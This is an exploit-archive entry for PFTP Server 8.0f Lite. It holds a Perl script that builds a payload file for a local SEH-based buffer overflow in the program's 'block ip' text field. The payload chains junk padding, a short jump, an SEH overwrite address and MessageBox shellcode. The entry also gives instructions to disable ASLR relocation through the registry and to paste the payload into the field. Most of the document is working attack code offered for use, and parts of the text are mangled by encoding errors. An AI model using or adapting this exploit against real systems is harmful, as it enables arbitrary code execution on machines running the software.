PFTP Server 8.0f Lite - textfield Local SEH Buffer Overflow



EKU-ID: 5077 CVE: OSVDB-ID:
Author: Robbie Corley Published: 2015-09-01 Verified: Verified
Download:

Rating

¡î¡î¡î¡î¡î
Home


#*************************************************************************************************************
#
# Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64  
# Date: 8-29-2015
# Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow.
#
# Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort
# to manually adding an exception to ASLR in the registry for this to work.
# creds to Corelan & team: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
#
# Edit HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ and add a new key called ¡°MoveImages¡± (DWORD)
# set the key to '0'.
#
# Instructions:
# Generate the payload text file by running this payload creator as is.  The payload is called: buffy.txt by default
# Next, open the pftp.exe program.
# Click 'options', 'advanced options', and 'block ip'.  Click on the text field and paste
# in your payload generated by this payload creator and click 'Add'.  It will look like this:
#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA됐31Ò²0d‹‹R ‹R‹B‹r ‹€~ 3u¨°¡ëÇx<‹Wx‹z Ç1¨ª‹4¯ÆE>Fatau¨°~Exitu¨¦‹z$Çf‹,o‹zÇ‹|¯¨¹ÇhytehkenBh Bro¡ë¨¢þI 1ÀQPÿ¡Á
#
# that's it.  You should then be greeted with a MessageBox. 
#**************************************************************************************************************
 
my $junk = "A" x 272;
 
#$nseh = "\xcc\xcc\xcc\xcc"; # breakpoint for testing
 
$nseh = "\xeb\x10\x90\x90";  # jump to shellcode
$seh = pack('V',0x03033303); # popad, call ebp from \Device\HarddiskVolume1\Windows\Fonts\StaticCache.dat, which is outside the module range and has SEH off
 
#MessageBox Shellc0de
#https://www.exploit-db.com/exploits/28996/
 
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
 
$nops = "\x90" x 20;
my $junk2   = "\x90" x 1000;
 
open(myfile,'>buffy.txt');
 
print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2;
close (myfile);